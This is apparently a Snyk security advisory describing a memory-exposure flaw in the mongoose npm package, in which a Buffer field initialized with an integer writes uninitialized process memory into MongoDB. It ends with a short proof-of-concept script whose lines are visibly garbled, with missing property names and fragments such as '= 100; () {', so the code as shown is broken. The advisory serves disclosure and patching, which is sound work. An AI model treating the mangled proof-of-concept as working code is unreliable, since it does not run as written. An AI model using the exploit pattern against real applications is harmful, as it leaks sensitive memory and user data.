Remote Memory Exposure Affecting mongoose package, versions >=3.5.5 <3.8.39 >=4.0.0 <4.3.6



    Attack Complexity High
    Confidentiality High

    Threat Intelligence

    Exploit Maturity Mature

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:mongoose:20160116
  • published 23 Jan 2016
  • disclosed 23 Jan 2016
  • credit ChALkeR

Introduced: 23 Jan 2016

CVE NOT AVAILABLE CWE-201 Open this link in a new tab


A potential memory disclosure vulnerability exists in mongoose. A Buffer field in a MongoDB document can be used to expose sensitive information such as code, runtime memory and user data into MongoDB.


Initializing a Buffer field in a document with integer N creates a Buffer of length N with non zero-ed out memory.


var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'

Initializing a MongoDB document field in such manner will dump uninitialized memory into MongoDB. The patch wraps Buffer field initialization in mongoose by converting a number value N to array [N], initializing the Buffer with N in its binary form.

Proof of concept

var mongoose = require('mongoose');

// data: Buffer is not uncommon, taken straight from the docs:
mongoose.model('Item', new mongoose.Schema({id: String, data: Buffer}));

var Item = mongoose.model('Item');

var sample = new Item(); = 'item1';

// This will create an uninitialized buffer of size 100 = 100; () {
    Item.findOne(function (err, result) {
        // Print out the data (exposed memory)
        mongoose.connection.db.dropDatabase(); // Clean up everything